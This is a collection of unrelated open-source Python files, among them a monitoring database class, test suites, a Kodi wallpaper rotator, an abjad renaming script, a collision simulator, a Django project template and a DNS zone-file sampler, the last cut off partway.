""" queryDict = {"sourceId": sourceId, "name": acName} retList = self.__update("lastUpdate", "activities", queryDict) if len(retList) == 0: return False else: return retList[0] def queryField(self, field, definedFields): """ Query the values of a field given a set of defined ones. :type field: string :param field: The field required in a string. :type field: list :param definedFields: A set of defined fields. :return: A list of values. """ retList = self.__select(field, "sources, activities", definedFields, "sources.id = activities.sourceId") return retList def getMatchingActivities(self, condDict): """ Gets all activities matching the defined conditions. :type condDict: dictionary. :param condDict: A dictionary containing the conditions. :return: a list of matching activities. """ retList = self.queryField(Activity.dbFields, condDict) acList = [] for acData in retList: acList.append(Activity(acData)) return acList def registerView(self, viewName, viewData, varFields): """ Registers a new view. :type viewName: string :param viewName: Name of the view. :type viewDescription: dictionary :param viewDescription: A dictionary containing the view description. :type varFields: list :param varFields: A list of variable fields. :return: S_OK / S_ERROR with the corresponding error message. """ retList = self.__select("id", "views", {"name": viewName}) if len(retList) > 0: return S_ERROR("Name for view name already exists") retList = self.__select("name", "views", {"definition": viewData}) if len(retList) > 0: return S_ERROR("View specification already defined with name '%s'" % retList[0][0]) self.__insert( "views", {"id": "NULL"}, {"name": viewName, "definition": viewData, "variableFields": ", ".join(varFields)} ) return S_OK() def getViews(self, onlyStatic): """ Gets views. :type onlyStatic: bool :param onlyStatic: Whether the views required are static or not. :return: A list of values. 
""" queryCond = {} if onlyStatic: queryCond["variableFields"] = "" return self.__select("id, name, variableFields", "views", queryCond) def getViewById(self, viewId): """ Gets a view for a given id. :type viewId: string :param viewId: The view id. :return: A list of values. """ if isinstance(viewId, six.string_types): return self.__select("definition, variableFields", "views", {"name": viewId}) else: return self.__select("definition, variableFields", "views", {"id": viewId}) def deleteView(self, viewId): """ Deletes a view for a given id. :type viewId: string :param viewId: The view id. """ self.__delete("views", {"id": viewId}) def getSources(self, dbCond, fields=[]): """ Gets souces for a given db condition. :type dbCond: dictionary :param dbCond: The required database conditions. :type fields: list :param fields: A list of required fields. :return: The list of results after the query is performed. """ if not fields: fields = "id, site, componentType, componentLocation, componentName" else: fields = ", ".join(fields) return self.__select(fields, "sources", dbCond) def getActivities(self, dbCond): """ Gets activities given a db condition. :type dbCond: dictionary :param dbCond: The required database conditions. :return: a list of activities. """ return self.__select("id, name, category, unit, type, description, bucketLength", "activities", dbCond) def deleteActivity(self, sourceId, activityId): """ Deletes an activity. :type sourceId: string :param sourceId: The source id. :type activityId: string :param activityId: The activity id. :return: S_OK with rrd filename / S_ERROR with a message. 
""" acCond = {"sourceId": sourceId, "id": activityId} acList = self.__select("filename", "activities", acCond) if len(acList) == 0: return S_ERROR("Activity does not exist") rrdFile = acList[0][0] self.__delete("activities", acCond) acList = self.__select("id", "activities", {"sourceId": sourceId}) if len(acList) == 0: self.__delete("sources", {"id": sourceId}) return S_OK(rrdFile)
adw0rd/lettuce-py3
tests/functional/test_terrain.py
# -*- coding: utf-8 -*-
# <Lettuce - Behaviour Driven Development for python>
# Copyright (C) <2010-2012> Gabriel Falcão <gabriel@nacaolivre.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
import os
import subprocess
from os.path import dirname, abspath, join, curdir

from nose.tools import assert_equals, with_setup
from tests.asserts import prepare_stdout


def test_imports_terrain_under_path_that_is_run():
    """Running from inside a feature dir must load that dir's terrain.py
    into ``lettuce.world``.
    """
    old_path = abspath(curdir)
    os.chdir(join(abspath(dirname(__file__)), 'simple_features', '1st_feature_dir'))
    try:
        # BUG FIX: the inline script previously used a Python 2 print
        # statement ("print 'it passed!'"), a SyntaxError on Python 3 that
        # made the subprocess exit non-zero.  print(...) works on 2 and 3.
        status, output = subprocess.getstatusoutput(
            'python -c "from lettuce import world;'
            'assert hasattr(world, \'works_fine\');'
            ' print(\'it passed!\')"')
        assert_equals(status, 0)
        assert_equals(output, "it passed!")
    finally:
        # restore the working directory even if an assertion above fails,
        # so later tests in the run don't inherit the wrong cwd
        os.chdir(old_path)


@with_setup(prepare_stdout)
def test_after_each_all_is_executed_before_each_all():
    "terrain.before.each_all and terrain.after.each_all decorators"
    from lettuce import step
    from lettuce import Runner
    from lettuce.terrain import before, after, world

    world.all_steps = []

    @before.all
    def set_state_to_before():
        world.all_steps.append('before')

    @step('append 1 in world all steps')
    def append_1_in_world_all_steps(step):
        world.all_steps.append("1")

    @step('append 2 more')
    def append_2_more(step):
        world.all_steps.append("2")

    @step('append 3 in world all steps')
    def append_during_to_all_steps(step):
        world.all_steps.append("3")

    @after.all
    def set_state_to_after(total):
        world.all_steps.append('after')

    runner = Runner(join(abspath(dirname(__file__)), 'simple_features', '2nd_feature_dir'))
    runner.run()

    assert_equals(
        world.all_steps,
        ['before', '1', '2', '3', 'after']
    )
Vagab0nd/SiCKRAGE
tests/notifier_tests.py
""" Test notifiers """ import unittest from sickchill.oldbeard import db from sickchill.oldbeard.notifiers.emailnotify import Notifier as EmailNotifier from sickchill.oldbeard.notifiers.prowl import Notifier as ProwlNotifier from sickchill.tv import TVEpisode, TVShow from sickchill.views.home import Home from tests import test_lib as test # noinspection PyProtectedMember class NotifierTests(test.SickChillTestDBCase): """ Test notifiers """ @classmethod def setUpClass(cls): num_legacy_shows = 3 num_shows = 3 num_episodes_per_show = 5 cls.mydb = db.DBConnection() cls.legacy_shows = [] cls.shows = [] # Per-show-notifications were originally added for email notifications only. To add # this feature to other notifiers, it was necessary to alter the way text is stored in # one of the DB columns. Therefore, to test properly, we must create some shows that # store emails in the old method (legacy method) and then other shows that will use # the new method. for show_counter in range(100, 100 + num_legacy_shows): show = TVShow(1, show_counter) show.name = "Show " + str(show_counter) show.episodes = [] for episode_counter in range(0, num_episodes_per_show): episode = TVEpisode(show, test.SEASON, episode_counter) episode.name = "Episode " + str(episode_counter + 1) episode.quality = "SDTV" show.episodes.append(episode) show.saveToDB() cls.legacy_shows.append(show) for show_counter in range(200, 200 + num_shows): show = TVShow(1, show_counter) show.name = "Show " + str(show_counter) show.episodes = [] for episode_counter in range(0, num_episodes_per_show): episode = TVEpisode(show, test.SEASON, episode_counter) episode.name = "Episode " + str(episode_counter + 1) episode.quality = "SDTV" show.episodes.append(episode) show.saveToDB() cls.shows.append(show) def setUp(self): """ Set up tests """ self._debug_spew("\n\r") @unittest.skip('Not yet implemented') def test_boxcar(self): """ Test boxcar notifications """ pass @unittest.skip('Cannot call directly without a request') def 
test_email(self): """ Test email notifications """ email_notifier = EmailNotifier() # Per-show-email notifications were added early on and utilized a different format than the other notifiers. # Therefore, to test properly (and ensure backwards compatibility), this routine will test shows that use # both the old and the new storage methodology legacy_test_emails = "email-1@address.com,email2@address.org,email_3@address.tv" test_emails = "email-4@address.com,email5@address.org,email_6@address.tv" for show in self.legacy_shows: showid = self._get_showid_by_showname(show.show_name) self.mydb.action("UPDATE tv_shows SET notify_list = ? WHERE show_id = ?", [legacy_test_emails, showid]) for show in self.shows: showid = self._get_showid_by_showname(show.show_name) Home.saveShowNotifyList(show=showid, emails=test_emails) # Now, iterate through all shows using the email list generation routines that are used in the notifier proper shows = self.legacy_shows + self.shows for show in shows: for episode in show.episodes: ep_name = episode._format_pattern('%SN - %Sx%0E - %EN - ') + episode.quality show_name = email_notifier._parseEp(ep_name) recipients = email_notifier._generate_recipients(show_name) self._debug_spew("- Email Notifications for " + show.name + " (episode: " + episode.name + ") will be sent to:") for email in recipients: self._debug_spew("-- " + email.strip()) self._debug_spew("\n\r") return True @unittest.skip('Not yet implemented') def test_emby(self): """ Test emby notifications """ pass @unittest.skip('Not yet implemented') def test_freemobile(self): """ Test freemobile notifications """ pass @unittest.skip('Not yet implemented') def test_growl(self): """ Test growl notifications """ pass @unittest.skip('Not yet implemented') def test_kodi(self): """ Test kodi notifications """ pass @unittest.skip('Not yet implemented') def test_libnotify(self): """ Test libnotify notifications """ pass @unittest.skip('Not yet implemented') def test_nma(self): """ Test nma 
notifications """ pass @unittest.skip('Not yet implemented') def test_nmj(self): """ Test nmj notifications """ pass @unittest.skip('Not yet implemented') def test_nmjv2(self): """ Test nmjv2 notifications """ pass @unittest.skip('Not yet implemented') def test_plex(self): """ Test plex notifications """ pass @unittest.skip('Cannot call directly without a request') def test_prowl(self): """ Test prowl notifications """ prowl_notifier = ProwlNotifier() # Prowl per-show-notifications only utilize the new methodology for storage; therefore, the list of legacy_shows # will not be altered (to preserve backwards compatibility testing) test_prowl_apis = "11111111111111111111,22222222222222222222" for show in self.shows: showid = self._get_showid_by_showname(show.show_name) Home.saveShowNotifyList(show=showid, prowlAPIs=test_prowl_apis) # Now, iterate through all shows using the Prowl API generation routines that are used in the notifier proper for show in self.shows: for episode in show.episodes: ep_name = episode._format_pattern('%SN - %Sx%0E - %EN - ') + episode.quality show_name = prowl_notifier._parse_episode(ep_name) recipients = prowl_notifier._generate_recipients(show_name) self._debug_spew("- Prowl Notifications for " + show.name + " (episode: " + episode.name + ") will be sent to:") for api in recipients: self._debug_spew("-- " + api.strip()) self._debug_spew("\n\r") return True @unittest.skip('Not yet implemented') def test_pushalot(self): """ Test pushalot notifications """ pass @unittest.skip('Not yet implemented') def test_pushbullet(self): """ Test pushbullet notifications """ pass @unittest.skip('Not yet implemented') def test_pushover(self): """ Test pushover notifications """ pass @unittest.skip('Not yet implemented') def test_pytivo(self): """ Test pytivo notifications """ pass @unittest.skip('Not yet implemented') def test_synoindex(self): """ Test synoindex notifications """ pass @unittest.skip('Not yet implemented') def test_synologynotifier(self): 
""" Test synologynotifier notifications """ pass @unittest.skip('Not yet implemented') def test_trakt(self): """ Test trakt notifications """ pass @unittest.skip('Not yet implemented') def test_tweet(self): """ Test tweet notifications """ pass @unittest.skip('Not yet implemented') def test_twilio(self): """ Test twilio notifications """ pass @staticmethod def _debug_spew(text): """ Spew text notifications :param text: to spew :return: """ if __name__ == '__main__' and text is not None: print(text) def _get_showid_by_showname(self, showname): """ Get show ID by show name :param showname: :return: """ if showname is not None: rows = self.mydb.select("SELECT show_id FROM tv_shows WHERE show_name = ?", [showname]) if len(rows) == 1: return rows[0]['show_id'] return -1 if __name__ == '__main__': print("==================") print("STARTING - NOTIFIER TESTS") print("==================") print("######################################################################") SUITE = unittest.TestLoader().loadTestsFromTestCase(NotifierTests) unittest.TextTestRunner(verbosity=2).run(SUITE)
shoaibali/kodi.background.rotator
randombackground.py
"""Rotate the Kodi wallpaper: pick a random picture from PICTURES_DIR and
install it as ``random<ext>``.

The previously-installed ``random*`` wallpaper is first renamed to a
throw-away name (the fractional digits of a random float) so it returns to
the selection pool.
"""
import os
import random
import sys

PICTURES_DIR = '/storage/pictures'

entries = os.listdir(PICTURES_DIR)

# Guard: nothing to do on an empty directory (resolves the old
# "TODO What if the directory is empty?" — random.choice would raise).
if not entries:
    sys.exit(0)

# BUG FIX: exclude the current "random*" wallpaper from the draw — picking it
# used to rename it away inside the loop and then crash on the final rename.
candidates = [name for name in entries if not name.startswith("random")]
if not candidates:
    sys.exit(0)

rfilename = random.choice(candidates)
rextension = os.path.splitext(rfilename)[1]

# Retire any existing "random*" wallpaper under a fresh random name,
# e.g. "0.123456" -> "123456<ext>".
for filename in entries:
    if filename.startswith("random"):
        extension = os.path.splitext(filename)[1]
        newname = os.path.join(PICTURES_DIR,
                               str(random.random()).rsplit('.', 1)[1] + extension)
        os.rename(os.path.join(PICTURES_DIR, filename), newname)

# Promote the newly chosen file to be the "random" wallpaper.
os.rename(os.path.join(PICTURES_DIR, rfilename),
          os.path.join(PICTURES_DIR, 'random' + rextension))
mscuthbert/abjad
abjad/tools/developerscripttools/RenameModulesScript.py
# -*- encoding: utf-8 -*-
import os
from abjad.tools import documentationtools
from abjad.tools import systemtools
from abjad.tools.developerscripttools.DeveloperScript import DeveloperScript
from abjad.tools.developerscripttools.ReplaceInFilesScript \
    import ReplaceInFilesScript


class RenameModulesScript(DeveloperScript):
    r'''Renames classes and functions.

    Handle renaming the module and package, as well as any tests,
    documentation or mentions of the class throughout the Abjad codebase:

    ..  shell::

        ajv rename --help

    '''

    ### PUBLIC PROPERTIES ###

    @property
    def alias(self):
        r'''Alias of script.

        Returns ``'rename'``.
        '''
        return 'rename'

    @property
    def long_description(self):
        r'''Long description of script.

        Returns string or none.
        '''
        return None

    @property
    def scripting_group(self):
        r'''Scripting group of script.

        Returns none.
        '''
        return None

    @property
    def short_description(self):
        r'''Short description of script.

        Returns string.
        '''
        return 'Rename public modules.'

    @property
    def version(self):
        r'''Version of script.

        Returns float.
        '''
        return 1.0

    ### PRIVATE METHODS ###

    def _codebase_name_to_codebase_docs_path(self, codebase):
        # Map a codebase nickname to the directory holding its API rst pages.
        from abjad import abjad_configuration
        if codebase == 'mainline':
            return os.path.join(
                abjad_configuration.abjad_directory,
                'docs', 'source', 'api', 'tools',
                )
        elif codebase == 'experimental':
            return os.path.join(
                abjad_configuration.abjad_experimental_directory,
                'docs', 'source', 'tools',
                )
        message = 'bad codebase name: {!r}.'
        message = message.format(codebase)
        raise Exception(message)

    def _codebase_name_to_codebase_tools_path(self, codebase):
        # Map a codebase nickname to its tools/ source directory.
        from abjad import abjad_configuration
        if codebase == 'mainline':
            return os.path.join(
                abjad_configuration.abjad_directory, 'tools')
        elif codebase == 'experimental':
            return os.path.join(
                abjad_configuration.abjad_experimental_directory, 'tools')
        message = 'bad codebase name: {!r}.'
        message = message.format(codebase)
        raise Exception(message)

    def _confirm_name_changes(self,
        old_codebase,
        old_tools_package_name,
        old_module_name,
        new_codebase,
        new_tools_package_name,
        new_module_name,
        ):
        # Interactively confirm the rename.  Returns True/False, or raises
        # SystemExit when the user aborts.
        max_codebase = max(len(old_codebase), len(new_codebase))
        old_codebase = old_codebase.ljust(max_codebase)
        new_codebase = new_codebase.ljust(max_codebase)
        print('')
        print('Is ...')
        print('')
        print(' [{}] {}.{}()'.format(
            old_codebase, old_tools_package_name, old_module_name))
        print(' ===>')
        print(' [{}] {}.{}()'.format(
            new_codebase, new_tools_package_name, new_module_name))
        print('')
        string = raw_input('... correct [yes, no, abort]? ').lower()
        print('')
        if string in ('y', 'yes'):
            return True
        elif string in ('a', 'abort', 'q', 'quit'):
            raise SystemExit
        elif string in ('n', 'no'):
            return False

    def _get_object_names(self, kind, codebase, tools_package_name):
        # Yield sorted class or function objects found in a tools package.
        assert kind in ('class', 'function')
        tools_path = self._codebase_name_to_codebase_tools_path(codebase)
        path = os.path.join(tools_path, tools_package_name)
        if kind == 'class':
            generator = documentationtools.yield_all_classes(
                code_root=path,
                include_private_objects=True,
                )
        elif kind == 'function':
            generator = documentationtools.yield_all_functions(
                code_root=path,
                include_private_objects=True,
                )
        return tuple(sorted(generator, key=lambda x: x.__name__))

    def _get_tools_package_names(self, codebase):
        # List public tools package directories for a codebase.
        tools_path = self._codebase_name_to_codebase_tools_path(codebase)
        names = []
        for x in os.listdir(tools_path):
            if os.path.isdir(os.path.join(tools_path, x)):
                if not x.startswith(('_', '.')):
                    names.append(x)
        return tuple(sorted(names))

    def _parse_tools_package_path(self, path):
        # Resolve "package.module" to (codebase, package, module); exits when
        # the path is malformed or the package cannot be found.
        from abjad import abjad_configuration
        if '.' not in path:
            raise SystemExit
        tools_package_name, module_name = path.split('.')
        mainline_tools_directory = os.path.join(
            abjad_configuration.abjad_directory,
            'tools',
            )
        for directory_name in os.listdir(mainline_tools_directory):
            directory = os.path.join(
                mainline_tools_directory, directory_name)
            if not os.path.isdir(directory):
                continue
            elif directory_name != tools_package_name:
                continue
            return 'mainline', tools_package_name, module_name
        experimental_tools_directory = os.path.join(
            abjad_configuration.abjad_experimental_directory,
            'tools',
            )
        # BUG FIX: this loop previously listed mainline_tools_directory again
        # (copy/paste error), so experimental packages were never found.
        for directory_name in os.listdir(experimental_tools_directory):
            directory = os.path.join(
                experimental_tools_directory, directory_name)
            if not os.path.isdir(directory):
                continue
            elif directory_name != tools_package_name:
                continue
            return 'experimental', tools_package_name, module_name
        raise SystemExit

    def _rename_old_api_page(self,
        old_codebase,
        old_tools_package_name,
        old_module_name,
        new_codebase,
        new_tools_package_name,
        new_module_name,
        ):
        # Move the module's .rst documentation page to its new location.
        print('Renaming old API page ...')
        old_docs_path = self._codebase_name_to_codebase_docs_path(old_codebase)
        new_docs_path = self._codebase_name_to_codebase_docs_path(new_codebase)
        old_rst_file_name = old_module_name + '.rst'
        new_rst_file_name = new_module_name + '.rst'
        old_api_path = os.path.join(
            old_docs_path, old_tools_package_name, old_rst_file_name)
        new_api_path = os.path.join(
            new_docs_path, new_tools_package_name, new_rst_file_name)
        command = 'mv {} {}'.format(
            old_api_path, new_api_path)
        systemtools.IOManager.spawn_subprocess(command)
        print('')

    def _rename_old_module(self,
        old_codebase,
        old_tools_package_name,
        old_module_name,
        new_codebase,
        new_tools_package_name,
        new_module_name,
        ):
        # git-move the module source file to its new name/location.
        print('Renaming old module ...')
        old_tools_path = self._codebase_name_to_codebase_tools_path(
            old_codebase)
        new_tools_path = self._codebase_name_to_codebase_tools_path(
            new_codebase)
        old_module = old_module_name + '.py'
        old_path = os.path.join(
            old_tools_path, old_tools_package_name, old_module)
        new_module = new_module_name + '.py'
        new_path = os.path.join(
            new_tools_path, new_tools_package_name, new_module)
        command = 'git mv -f {} {}'.format(
            old_path, new_path)
        systemtools.IOManager.spawn_subprocess(command)
        print('')

    def _rename_old_test_files(self,
        old_codebase,
        old_tools_package_name,
        old_module_name,
        new_codebase,
        new_tools_package_name,
        new_module_name,
        ):
        # git-move every test file matching the old module name prefix.
        print('Renaming old test file(s) ...')
        old_tools_path = self._codebase_name_to_codebase_tools_path(
            old_codebase)
        old_test_path = os.path.join(
            old_tools_path, old_tools_package_name, 'test')
        if not os.path.exists(old_test_path):
            return
        new_tools_path = self._codebase_name_to_codebase_tools_path(
            new_codebase)
        new_test_path = os.path.join(
            new_tools_path, new_tools_package_name, 'test')
        old_test_file_prefix = 'test_{}_{}'.format(
            old_tools_package_name, old_module_name)
        old_test_file_names = [x for x in os.listdir(old_test_path)
            if x.startswith(old_test_file_prefix) and x.endswith('.py')]
        for old_test_file_name in old_test_file_names:
            old_test_file_path = os.path.join(
                old_test_path, old_test_file_name)
            old_test_file_suffix = old_test_file_name[
                len(old_test_file_prefix):]
            new_test_file_name = 'test_{}_{}{}'.format(
                new_tools_package_name, new_module_name, old_test_file_suffix)
            new_test_file_path = os.path.join(
                new_test_path, new_test_file_name)
            command = 'git mv -f {} {}'.format(
                old_test_file_path, new_test_file_path)
            systemtools.IOManager.spawn_subprocess(command)
        print('')

    def _update_codebase(self,
        old_codebase,
        old_tools_package_name,
        old_module_name,
        new_codebase,
        new_tools_package_name,
        new_module_name,
        ):
        # Rewrite every mention of the old dotted name, old test prefix and
        # bare module name throughout the repository.
        from abjad import abjad_configuration
        without_dirs = ['--without-dirs', 'build', '--without-dirs', '_build']
        directory = abjad_configuration.abjad_root_directory
        print('Updating codebase ...')
        print('')
        old_text = '{}.{}'.format(old_tools_package_name, old_module_name)
        new_text = '{}.{}'.format(new_tools_package_name, new_module_name)
        command = [
            directory,
            old_text,
            new_text,
            '--force',
            '--whole-words-only',
            #'--verbose',
            ]
        command.extend(without_dirs)
        ReplaceInFilesScript()(command)
        print('')
        old_text = 'test_{}_{}_'.format(
            old_tools_package_name, old_module_name)
        new_text = 'test_{}_{}_'.format(
            new_tools_package_name, new_module_name)
        command = [directory, old_text, new_text, '--force', '--verbose']
        command.extend(without_dirs)
        ReplaceInFilesScript()(command)
        print('')
        old_text = old_module_name
        new_text = new_module_name
        command = [
            directory,
            old_text,
            new_text,
            '--force',
            '--whole-words-only',
            #'--verbose',
            ]
        command.extend(without_dirs)
        ReplaceInFilesScript()(command)
        print('')

    ### PUBLIC METHODS ###

    def process_args(self, args):
        r'''Processes `args`.

        Returns none.
        '''
        systemtools.IOManager.clear_terminal()
        # Handle source path:
        old_codebase, old_tools_package_name, old_module_name = \
            self._parse_tools_package_path(args.source)
        old_codebase_tools_path = self._codebase_name_to_codebase_tools_path(
            old_codebase)
        old_module_path = os.path.join(
            old_codebase_tools_path,
            old_tools_package_name,
            old_module_name + '.py',
            )
        if not os.path.exists(old_module_path):
            message = 'source does not exist: {}'
            message = message.format(old_module_path)
            raise SystemExit(message)
        # Handle destination path:
        new_codebase, new_tools_package_name, new_module_name = \
            self._parse_tools_package_path(args.destination)
        new_codebase_tools_path = self._codebase_name_to_codebase_tools_path(
            new_codebase)
        new_module_path = os.path.join(
            new_codebase_tools_path,
            new_tools_package_name,
            new_module_name + '.py',
            )
        if os.path.exists(new_module_path):
            message = 'destination already exists: {}'
            # BUG FIX: previously formatted with old_module_path, so the
            # error reported the wrong file.
            message = message.format(new_module_path)
            raise SystemExit(message)
        # Process changes:
        new_args = (
            old_codebase,
            old_tools_package_name,
            old_module_name,
            new_codebase,
            new_tools_package_name,
            new_module_name,
            )
        if not self._confirm_name_changes(*new_args):
            raise SystemExit
        self._rename_old_test_files(*new_args)
        self._rename_old_api_page(*new_args)
        self._rename_old_module(*new_args)
        self._update_codebase(*new_args)
        raise SystemExit

    def setup_argument_parser(self, parser):
        r'''Sets up argument `parser`.

        Returns none.
        '''
        parser.add_argument(
            'source',
            help='toolspackage path of source module',
            )
        parser.add_argument(
            'destination',
            help='toolspackage path of destination module',
            )
hniemeyer/HardSphereSim
EventManager.py
""" Module defining the Event class which is used to manage collissions and check their validity """ from itertools import combinations from copy import copy from particle import Particle class EventParticle(object): def __init__(self, particle1, particle2): self.particle1 = particle1 self.particle2 = particle2 self.id = (self.particle1.getCollisionCountAsCopy(), self.particle2.getCollisionCountAsCopy()) self.timeUntilCollision = self.particle1.collideParticle(self.particle2) def isValid(self): return self.id == (self.particle1.getCollisionCountAsCopy(), self.particle2.getCollisionCountAsCopy()) def reevaluateCollisionTime(self): self.id = (self.particle1.getCollisionCountAsCopy(), self.particle2.getCollisionCountAsCopy()) self.timeUntilCollision = self.particle1.collideParticle(self.particle2) def doCollision(self): self.particle1.bounceParticle(self.particle2) class EventWallX(object): def __init__(self, particle): self.particle = particle self.id = self.particle.getCollisionCountAsCopy() self.timeUntilCollision = self.particle.collidesWallX() def isValid(self): return self.id == self.particle.getCollisionCountAsCopy() def reevaluateCollisionTime(self): self.id = self.particle.getCollisionCountAsCopy() self.timeUntilCollision = self.particle.collidesWallX() def doCollision(self): self.particle.bounceX() class EventWallY(object): def __init__(self, particle): self.particle = particle self.id = self.particle.getCollisionCountAsCopy() self.timeUntilCollision = self.particle.collidesWallY() def isValid(self): return self.id == self.particle.getCollisionCountAsCopy() def reevaluateCollisionTime(self): self.id = self.particle.getCollisionCountAsCopy() self.timeUntilCollision = self.particle.collidesWallY() def doCollision(self): self.particle.bounceY() class EventManager(object): def __init__(self, ListOfParticles): self.ListOfParticles = ListOfParticles self.ListOfEvents = [] for (particle1, particle2) in combinations(self.ListOfParticles, 2): 
self.ListOfEvents.append(EventParticle(particle1, particle2)) for particle in self.ListOfParticles: self.ListOfEvents.append(EventWallX(particle)) self.ListOfEvents.append(EventWallY(particle)) self.sortEventList() def sortEventList(self): def sorting_closure(event): if event.timeUntilCollision is None or event.timeUntilCollision < 0.0: return 1.0e7 else: return event.timeUntilCollision self.ListOfEvents = sorted(self.ListOfEvents, key=sorting_closure) def step(self): for event in self.ListOfEvents: if not event.isValid(): event.reevaluateCollisionTime() self.sortEventList() collTime = copy(self.ListOfEvents[0].timeUntilCollision) for particle in self.ListOfParticles: particle.advance(collTime) self.ListOfEvents[0].doCollision() for event in self.ListOfEvents: if event.timeUntilCollision is not None: event.timeUntilCollision -= collTime if __name__ == '__main__': import numpy as np import pylab as plt a = Particle(np.array([0.1, 0.5]), np.array([0.01, 0.1]), 0.05, 2.0) b = Particle(np.array([0.4, 0.5]), np.array([-0.1, 0.01]), 0.05, 2.0) manager = EventManager([a,b]) for i in range(20): plt.title(a.t) plt.scatter([a._x[0], b._x[0]], [a._x[1], b._x[1]]) print a._x print b._x plt.xlim([0,1]) plt.ylim([0,1]) plt.show() manager.step()
stephanepechard/projy
projy/templates/DjangoProjectTemplate.py
# -*- coding: utf-8 -*-
""" Projy template for PythonPackage. """

# system
from datetime import date
from os import mkdir, rmdir
from shutil import move
from subprocess import call

# parent class
from projy.templates.ProjyTemplate import ProjyTemplate

# collectors
from projy.collectors.AuthorCollector import AuthorCollector
from projy.collectors.AuthorMailCollector import AuthorMailCollector


class DjangoProjectTemplate(ProjyTemplate):
    """ Projy template class for PythonPackage. """

    def __init__(self):
        ProjyTemplate.__init__(self)

    def directories(self):
        """ Return the names of directories to be created. """
        directories_description = [
            self.project_name,
            self.project_name + '/conf',
            self.project_name + '/static',
        ]
        return directories_description

    def files(self):
        """ Return the names of files to be created.

        Each entry is [directory, file name, template class name].
        """
        files_description = [
            # configuration
            [self.project_name, 'Makefile', 'DjangoMakefileTemplate'],
            [self.project_name + '/conf', 'requirements_base.txt', 'DjangoRequirementsBaseTemplate'],
            [self.project_name + '/conf', 'requirements_dev.txt', 'DjangoRequirementsDevTemplate'],
            [self.project_name + '/conf', 'requirements_production.txt', 'DjangoRequirementsProdTemplate'],
            [self.project_name + '/conf', 'nginx.conf', 'DjangoNginxConfTemplate'],
            [self.project_name + '/conf', 'supervisord.conf', 'DjangoSupervisorConfTemplate'],
            [self.project_name, 'fabfile.py', 'DjangoFabfileTemplate'],
            [self.project_name, 'CHANGES.txt', 'PythonPackageCHANGESFileTemplate'],
            [self.project_name, 'LICENSE.txt', 'GPL3FileTemplate'],
            [self.project_name, 'README.txt', 'READMEReSTFileTemplate'],
            [self.project_name, '.gitignore', 'DjangoGitignoreTemplate'],
            # django files
            [self.project_name, 'dev.py', 'DjangoSettingsDevTemplate'],
            [self.project_name, 'prod.py', 'DjangoSettingsProdTemplate'],
        ]
        return files_description

    def substitutes(self):
        """ Return the substitutions for the templating replacements. """
        author_collector = AuthorCollector()
        mail_collector = AuthorMailCollector()
        substitute_dict = {
            'project': self.project_name,
            'project_lower': self.project_name.lower(),
            'date': date.today().isoformat(),
            'author': author_collector.collect(),
            'author_email': mail_collector.collect(),
        }
        return substitute_dict

    def posthook(self):
        """ Finalize the generated project: build the virtualenv, create the
        Django project, split the settings per environment, organize the
        layout and initialize a git repository. """
        p = self.project_name  # hoisted: was re-formatted on every line below

        # build the virtualenv
        call(['make'])
        # create the Django project
        call(['./venv/bin/django-admin.py', 'startproject', p])

        # transform original settings files into 3 files for different env
        mkdir('{p}/settings'.format(p=p))
        self.touch('{p}/settings/__init__.py'.format(p=p))
        move('dev.py', '{p}/settings'.format(p=p))
        move('prod.py', '{p}/settings'.format(p=p))
        move('{p}/{p}/settings.py'.format(p=p),
             '{p}/settings/base.py'.format(p=p))

        # organize files nicely
        mkdir('{p}/templates'.format(p=p))
        move('{p}/manage.py'.format(p=p), 'manage.py')
        move('{p}/{p}/__init__.py'.format(p=p), '{p}/'.format(p=p))
        move('{p}/{p}/urls.py'.format(p=p), '{p}/'.format(p=p))
        move('{p}/{p}/wsgi.py'.format(p=p), '{p}/'.format(p=p))
        rmdir('{p}/{p}'.format(p=p))

        # create empty git repo
        call(['git', 'init'])

        # replace some lines
        # NOTE(review): the moved settings file is 'prod.py' but wsgi is
        # pointed at 'settings.production' — confirm the intended module name.
        self.replace_in_file('{p}/wsgi.py'.format(p=p),
                             '"{p}.settings"'.format(p=p),
                             '"{p}.settings.production"'.format(p=p))
        # PERF/BUG FIX: substitutes() was called twice here, running the
        # author and mail collectors once per access; call it once.
        subs = self.substitutes()
        self.replace_in_file('{p}/settings/base.py'.format(p=p),
                             u"    # ('Your Name', 'your_email@example.com'),",
                             u"    ('{}', '{}'),".format(subs['author'],
                                                         subs['author_email']))
smutt/WRL
topThick.py
#!/usr/bin/python # The file is part of the WRL Project. # # The WRL Project is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # The WRL Project is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # Copyright (C) 2017, Andrew McConachie, <andrew.mcconachie@icann.org> import os import sys import random import dns.resolver numTestDomains = 100 numTopTLDs = 100 ignoreDomains = ['com', 'net', 'jobs', 'cat', 'mil', 'edu', 'gov', 'int', 'arpa'] serverZone = '.ws.sp.am' # DNS Zone containing CNAME records pointing to whois FQDNs def dbg(s): # print s pass random.seed() zFiles = os.listdir('zonefiles/') #dbgFiles = 10 # How many files to read while developing this, remove when finished coding tlds = [] for zf in zFiles: # if len(tlds) >= dbgFiles: # For developing, remove when finished coding # break dbg(zf) tld = {} if zf.find(".txt") == -1: dbg("This should not happen") continue zfh = open('zonefiles/' + zf, 'r') lines = zfh.read().splitlines() zfh.close() dbg("after file read") tld['name'] = lines[0].split(".")[0].strip() if tld['name'] in ignoreDomains: dbg("Ignoring:" + tld['name']) continue dbg("after name split") rrs = [] for line in lines: rr = line.split("\t") rrs.append(rr) dbg("after rr split") ns = [] for rr in rrs: if rr[3].lower() == 'ns': ns.append(rr[0].split(".")[0]) dbg("after counting NS records") if len(ns) < numTestDomains: continue else: tld['size'] = len(ns) tld['domains'] = random.sample(ns, numTestDomains) for d in tld['domains']: dbg(d + "." 
